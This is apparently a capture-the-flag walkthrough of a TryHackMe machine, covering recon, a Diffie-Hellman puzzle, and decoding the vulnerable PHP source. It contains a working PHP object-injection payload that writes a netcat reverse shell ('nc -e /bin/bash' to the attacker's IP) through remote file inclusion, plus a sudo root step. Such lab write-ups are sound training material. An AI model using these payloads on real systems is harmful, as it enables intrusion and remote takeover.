This was a great CTF machine for beginners but somehow it had very low solves either because of the very first task which was finding a directory by solving a Diffie-Hellman cryptography challenge. Without any further spoiler, let's get started.

Note

This machine is only available on TryHackMe. You can delpoy the machine in cloud and access the server via OpenVPN and hack it right away! So sign-in and follows along with me!

Nmap

Lets do some basic reconnaissance, starting off with an nmap scan (nmap -sV -sC -A 10.0.0.6) reveals that the following information:-

Host is up (0.27s latency).
Not shown: 974 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:da:b7:0d:a7:a1:cc:8e:ac:4b:19:6d:25:2b:3e:77 (RSA)
|   256 c1:0c:5a:db:6c:d6:a3:15:96:85:21:e9:48:65:28:42 (ECDSA)
|_  256 0f:1a:6a:d1:bb:cb:a6:3e:bd:8f:99:8d:da:2f:30:86 (EdDSA)
80/tcp    open     http           Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/StuxCTF/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Default Page

So, we can see that we have an Apache Web Server running on port 80 and SSH to it's default port 22. Let's move further.

HTTP Enumeration and The Hidden Directory

Heading over to the web server gives a pretty blank website so from there I inspected the source code which had the following data:-

<html>
	<head>
		<title>Default Page</title>
	</head>
	<body>
		<!-- The secret directory is...
		p: 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251;
		g: 7;
		a: 330;
		b: 450;
		g^c: 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617;
		-->
		is blank....
	</body>
</html>

It has a commented out data which is somehow the hidden directory we want to access. Checking robots.txt shows that we have one disallowed entry let's check it out.

# robots.txt generated by StuxCTF
# Diffie-Hellman
User-agent: *
Disallow: 
Disallow: /StuxCTF/

We can see that we have a disallowed entry for StuxCTF and this could possibly be a hint? Maybe? Moving over to it reveals that we might need a file or any other route to access /StuxCTF so we are at deadend here, but we have a secret directory which is encrypted. Hmm, let's try and decrypt it.

Decrypting the Diffie-Hellman

From robots.txt we can see that it says "Diffie-Hellmam" which most probably is denoting this to the data we found earlier. Searching for the decryption script or the algoithm, I found a challenge with similar variables, so I used this to assist me (blog that helped me). I used this blog as reference to solve it.

Using following script we can get the hidden directory:-

#!/usr/bin/python3

p=9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251
g=7
a=330
b=450
gc=6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617

gca = (gc**a) % p
gcab = (gca**b) % p

print(str(gcab)[:128])
#47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055

Running the above script we will get the hidden directory.

Reverse Shell via PHP's Unserialize Object

Moving over to that page, we can see the following:-

Inspecting the webpage gives the follwoing data and it has a very interesting piece of data:-

        </nav>
        <!-- hint: /?file= -->
        <div class="container">
            <div class="jumbotron">
				<center>
					<h1>Follow the white rabbit..</h1>
				</center>
            </div>
        </div>            
        

At first it seemed like it was LFI challenge, but it wasn't. I tried accessing files like /etc/passwd and others but all failed. At last, I tried to acess the index.php itself that gives a very long hex encoded string which was

3d3d67432b384349794a47502b7757623068324c386f67507641696369786a50355232626939435067414349676f67507641696369786a5030425861794e326376776a50694d6e617534576174354363684a48647a523362764a324c7a70324c7a52585a7a4e585969307a59794e484930425861794e32633841434967414349674143494b347a4c67496e5938344464776c6d636a4e334c38346a497a706d4c756c5762754d6a4c78456a4c78305365795657647870324c7a70324c7a52585a7a4e585969307a59794e484930425861794e32633841434967414349674143494b347a4c67496e593841434967414349674143496741434967346a647052324c3841434967414349674143494b347a4c67496e5938346a647052324c38414349674143496741434967414349676f67507641696369786a507956476475563259767754434a6b51434b347a4c67496e593834544d6f39435075344364704a6d59684a48496c5258616f6448496c68476467633362737832624735544d6f7854434a6b51434a6f67507641696369786a507956476475563259386b51434a6b67432b384349794a47502b496962764a4864764a576231706d49394d336368783259675958616b784449674143496741434967414349674169432b384349794a47502b4969636c35576168526e62764e6d49394d336368783259675958616b7844496741434967414349676f67507641696369786a507430434939554762705a32507641694f303557616f42534c744543506741434967414349674169432b384349794a47502b595859753943506741434967414349674169432b384349794a47502b5958616b394350674143496741434967414349676f67507641696369786a50326c475a76774449674143496741434967414349674169432b384349794a47502b45324c3855576276686b5069414861773543656c526d62704a53506d566d636f4269496b355759794a574c79466d5932466d6269307a637a4647626a42535938414349674143496741434967414349674143494b347a4c67496e5938346a6276524864314a324c38414349674143496741434967414349674143494b347a4c67496e5938346a626842336376776a62766c47646864576132466d62675547626e64326255356a4935786d62763169637a4a53507a4e5859734e4749754647637a78444967414349674143496741434967414349674143494b347a4c67496e5938346a4979466d5932466d6269307a6373396d63303532626a315359704a58596749535a7a7857596d4a53506b56475a754647633456574c686c6d636842694979466d5932466d626a4953503056325a7946476474454764685247496955326377464762733932596930545a7364325a7652584c685258596b4269496b5632637746476273393259675547626e64326230316963684a6d6468356d49394d3363687832596749696276524864314a6d4939554763355248497539476430566e5938414349674143496741434967414349674143494b347a4c67496e5938346a497956475a6856476174495859695a5859754a53507a4e5859734e4749326c475a38414349674143496741434967414349676f67507641696369786a506949585a756c5759303532626a4a53507a4e5859734e4749326c475a384143496741434967414349674169432b384349794a47502b4943637652584c6b564765705a574c79466d5932466d626751486231466d5a6c52574c79466d5932466d6267495859695a5859754a53507a4e5859734e474932466d623841434967414349674143494b347a4c67496e59383454656b396d593841434967414349674143494b347a4c67496e593834445a6856476176774449674143494b347a4c67496e5938347a4c674979637a4e6d4c6c785765304e334c7a4e3359764d48646c4e3363684a53506d566d636f4269493056575a6f4e585a736c48647a4a535073566d6367736d62707847506741434967414349674169432b384349794a47502b384349694d33636a35696270316d4c77466d63304e486476396d59764d33636a397963305632637a466d493959575a796847496951585a6c6832636c785765304e6e493977575a79427961756c47623841434967414349674143494b347a4c67496e5938346a497830545a734632597a314362686c47647035576167774361305257613331535a6a6c6d646c5257506f52485a70646e4939516e626c526e62764e474969516e63764233646c6c6d646930545a74466d62674547646c3147506741434967414349674169432b384349794a47502b49434f74594556564a535030563263794647616a42535930565762386b67432b384349794a47502b554762306c476476776a52554e4565315233552b554762306c47643841434967414349674143494b347a4c67496e593834445a6856476138414349674169432b384349794a47502b7757623068474946425657554e3054454643504b347a4c67496e59386f67507641696369787a4f706b535a74466d6266564762705a474a6f4d486475564764753932596652585a6e39565a736c6d5a6f556d6570785759704a585a7a3557644b347a4c67496e5938306e432b384349794a4750376b534b706b534b3035575a303532626a52434973496949677779636e4647646b67535a6a46476277566d63664a48647a686963694a44627568535a6b393259755632583059545a7a466d596f59585a794a48647a6843656c686d4d756c6d59673847616a5647496741434967414349676f67507641696369787a4f704969496777694969675365684a6e6368425350674d335a6852484a6741434967414349674169432b384349794a4750376b535a74466d6266564762705a474a6f4d486475564764753932596652585a6e39565a736c6d5a673044493035575a303532626a5243496741434967414349676f67507641696369787a65704943636f426e4c3456475a756c6d493930545a74466d6266564762705a474a6f5957614b347a4c67496e59386f675076416963697854664b347a4c67496e5938736a49685133637068585267386d6267554762705a6b49673847616a5647496741434967414349676f67507641696369787a65706b535a74466d6266564762705a474a6f4d48647a6c47656c39565a736c6d5a6841694a6d41534b6c3157597539565a736c6d5a6b6743646c4e33637068695a707067507641696369787a4f6464535a736c6d5a6e734656466430586b41535067555762683532586c7857616d5269432b384349794a47504b347a4c67496e59386f675076416963697854664b347a4c67496e59383048496741434967414349676f67507641696369787a4f7045476468526d50744d58616f52484a6777535a736c6d5a2b307963706847646b6779633035575a303532626a394664314233586c7857616d42434967414349674143496741434967414349674169432b384349794a4750376c434b304e5764795233636c52325866426962766c47646a3557646d42434967414349674143494b347a4c67496e5938736a49304e585a304243637456485a69415350674547646852474a674d5761734a57647742434967414349674143494b347a4c67496e5938736a49306848647541586231526d49673044496c7857616d5243496a6c4762695648636741434967414349674169432b384349794a47503742535a736c6d5a674d3363687832594b347a4c67496e593873544b7767795a756c4764793947636c4a335879396d6379566d432b384349794a4750

By converting this to ascii that gives the content of index.php in reverse encoded base64 data including the PHP code.

==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

Reverting the encoded data and decoding it gives the following:-

PGJyIC8+CmVycm9yX3JlcG9ydGluZygwKTs8YnIgLz4KY2xhc3MgZmlsZSB7PGJyIC8+CiAgICAgICAgcHVibGljICRmaWxlID0gImR1bXAudHh0Ijs8YnIgLz4KICAgICAgICBwdWJsaWMgJGRhdGEgPSAiZHVtcCB0ZXN0Ijs8YnIgLz4KICAgICAgICBmdW5jdGlvbiBfX2Rlc3RydWN0KCl7PGJyIC8+CiAgICAgICAgICAgICAgICBmaWxlX3B1dF9jb250ZW50cygkdGhpcy0+ZmlsZSwgJHRoaXMtPmRhdGEpOzxiciAvPgogICAgICAgIH08YnIgLz4KfTxiciAvPgo8YnIgLz4KPGJyIC8+CiRmaWxlX25hbWUgPSAkX0dFVFsnZmlsZSddOzxiciAvPgppZihpc3NldCgkZmlsZV9uYW1lKSAmJiAhZmlsZV9leGlzdHMoJGZpbGVfbmFtZSkpezxiciAvPgogICAgICAgIGVjaG8gIkZpbGUgbm8gRXhpc3QhIjs8YnIgLz4KfTxiciAvPgo8YnIgLz4KaWYoJGZpbGVfbmFtZT09ImluZGV4LnBocCIpezxiciAvPgogICAgICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGZpbGVfbmFtZSk7PGJyIC8+CiAgICAgICAgJHRhZ3MgPSBhcnJheSgiIiwgIiIpOzxiciAvPgogICAgICAgIGVjaG8gYmluMmhleChzdHJyZXYoYmFzZTY0X2VuY29kZShubDJicihzdHJfcmVwbGFjZSgkdGFncywgIiIsICRjb250ZW50KSkpKSk7PGJyIC8+Cn08YnIgLz4KdW5zZXJpYWxpemUoZmlsZV9nZXRfY29udGVudHMoJGZpbGVfbmFtZSkpOzxiciAvPgo8YnIgLz4KPCFET0NUWVBFIGh0bWw+PGJyIC8+CiAgICA8aGVhZD48YnIgLz4KICAgICAgICA8dGl0bGU+U3R1eENURjwvdGl0bGU+PGJyIC8+Cgk8bWV0YSBjaGFyc2V0PSJVVEYtOCI+PGJyIC8+CiAgICAgICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xIj48YnIgLz4KICAgICAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImFzc2V0cy9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIC8+PGJyIC8+CiAgICAgICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJhc3NldHMvY3NzL3N0eWxlLmNzcyIgLz48YnIgLz4KICAgIDwvaGVhZD48YnIgLz4KICAgICAgICA8Ym9keT48YnIgLz4KICAgICAgICA8bmF2IGNsYXNzPSJuYXZiYXIgbmF2YmFyLWRlZmF1bHQgbmF2YmFyLWZpeGVkLXRvcCI+PGJyIC8+CiAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPjxiciAvPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJuYXZiYXItaGVhZGVyIj48YnIgLz4KICAgICAgICAgICAgICA8YnV0dG9uIHR5cGU9ImJ1dHRvbiIgY2xhc3M9Im5hdmJhci10b2dnbGUgY29sbGFwc2VkIiBkYXRhLXRvZ2dsZT0iY29sbGFwc2UiIGRhdGEtdGFyZ2V0PSIjbmF2YmFyIiBhcmlhLWV4cGFuZGVkPSJmYWxzZSIgYXJpYS1jb250cm9scz0ibmF2YmFyIj48YnIgLz4KICAgICAgICAgICAgICAgIDxzcGFuIGNsYXNzPSJzci1vbmx5Ij5Ub2dnbGUgbmF2aWdhdGlvbjwvc3Bhbj48YnIgLz4KICAgICAgICAgICAgICA8L2J1dHRvbj48YnIgLz4KICAgICAgICAgICAgICA8YSBjbGFzcz0ibmF2YmFyLWJyYW5kIiBocmVmPSJpbmRleC5waHAiPkhvbWU8L2E+PGJyIC8+CiAgICAgICAgICAgIDwvZGl2PjxiciAvPgogICAgICAgICAgPC9kaXY+PGJyIC8+CiAgICAgICAgPC9uYXY+PGJyIC8+CiAgICAgICAgPCEtLSBoaW50OiAvP2ZpbGU9IC0tPjxiciAvPgogICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+PGJyIC8+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9Imp1bWJvdHJvbiI+PGJyIC8+CgkJCQk8Y2VudGVyPjxiciAvPgoJCQkJCTxoMT5Gb2xsb3cgdGhlIHdoaXRlIHJhYmJpdC4uPC9oMT48YnIgLz4KCQkJCTwvY2VudGVyPjxiciAvPgogICAgICAgICAgICA8L2Rpdj48YnIgLz4KICAgICAgICA8L2Rpdj4gICAgICAgICAgICA8YnIgLz4KICAgICAgICA8c2NyaXB0IHNyYz0iYXNzZXRzL2pzL2pxdWVyeS0xLjExLjMubWluLmpzIj48L3NjcmlwdD48YnIgLz4KICAgICAgICA8c2NyaXB0IHNyYz0iYXNzZXRzL2pzL2Jvb3RzdHJhcC5taW4uanMiPjwvc2NyaXB0PjxiciAvPgogICAgPC9ib2R5PjxiciAvPgo8L2h0bWw+PGJyIC8+Cg==

Decoding the above:-

<br />
error_reporting(0);<br />
class file {<br />
        public $file = "dump.txt";<br />
        public $data = "dump test";<br />
        function __destruct(){<br />
                file_put_contents($this->file, $this->data);<br />
        }<br />
}<br />
<br />
<br />
$file_name = $_GET['file'];<br />
if(isset($file_name) && !file_exists($file_name)){<br />
        echo "File no Exist!";<br />
}<br />
<br />
if($file_name=="index.php"){<br />
        $content = file_get_contents($file_name);<br />
        $tags = array("", "");<br />
        echo bin2hex(strrev(base64_encode(nl2br(str_replace($tags, "", $content)))));<br />
}<br />
unserialize(file_get_contents($file_name));<br />
<br />
<!DOCTYPE html><br />
    <head><br />
        <title>StuxCTF</title><br />
	<meta charset="UTF-8"><br />
        <meta name="viewport" content="width=device-width, initial-scale=1"><br />
        <link rel="stylesheet" href="assets/css/bootstrap.min.css" /><br />
        <link rel="stylesheet" href="assets/css/style.css" /><br />
    </head><br />
        <body><br />
        <nav class="navbar navbar-default navbar-fixed-top"><br />
          <div class="container"><br />
            <div class="navbar-header"><br />
              <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"><br />
                <span class="sr-only">Toggle navigation</span><br />
              </button><br />
              <a class="navbar-brand" href="index.php">Home</a><br />
            </div><br />
          </div><br />
        </nav><br />
        <!-- hint: /?file= --><br />
        <div class="container"><br />
            <div class="jumbotron"><br />
				<center><br />
					<h1>Follow the white rabbit..</h1><br />
				</center><br />
            </div><br />
        </div>            <br />
        <script src="assets/js/jquery-1.11.3.min.js"></script><br />
        <script src="assets/js/bootstrap.min.js"></script><br />
    </body><br />
</html><br />

I've never done any challenge that was like this and it was the reason I loved this machine much, it pushed me to the limit. I tried every resource available to me, but somehow I was way too clueless and far away from getting this exploited. After sometime, I contacted Stuxnet and he told me to check this to move on. After a long research again (and having a very long conversation with the author), I figured out the following way to get a shell.

At first, I created a serialized object with follwing php code:-

<?php
class file
{
 public $file = 'n.php';
 public $data = '<?php shell_exec("nc -e /bin/bash 10.8.1.184 1234"); ?>';
}

echo (serialize(new file));

?>

Remember to use you tun0 IP for reverse shell!

[email protected]:~$ gedit new.php
[email protected]:~$ php new.php > shell.txt
[email protected]:~$ cat shell.txt
O:4:"file":2:{s:4:"file";s:5:"n.php";s:4:"data";s:55:"<?php shell_exec("nc -e /bin/bash 10.8.1.184 1234"); ?>";}

Now, the author of the machine told me that urlopen is enabled which means we can exploit the /?file= to include any file on the server, so as we created the shell.txt and using a local HTTP server with the use of python -m SimpleHTTPServer 1337 we can use the follwoing url to include our shell.txt and unserialize(file_get_contents($file_name)) this line will unserialize our serialized object hence creating a file n.php with nc -e /bin/bash 10.8.1.184 1234 as it's content.

Going to following url will create a n.php with the help of shell.txt:-

http://10.0.0.6/47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055/?file=http://10.8.1.184:1337/shell.txt

After this we setup a listener and visited 10.0.0.6/47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055/n.php and we got a shell.

Root

This disappointed me a little because I thought it would be something like spoofing the SUID binaries to get a shell or something similar. The root was easier, way easier. I first tried to check grecia/.bash_history but permission denied. So, I tried very basic one sudo su which to my surprise gave the root shell!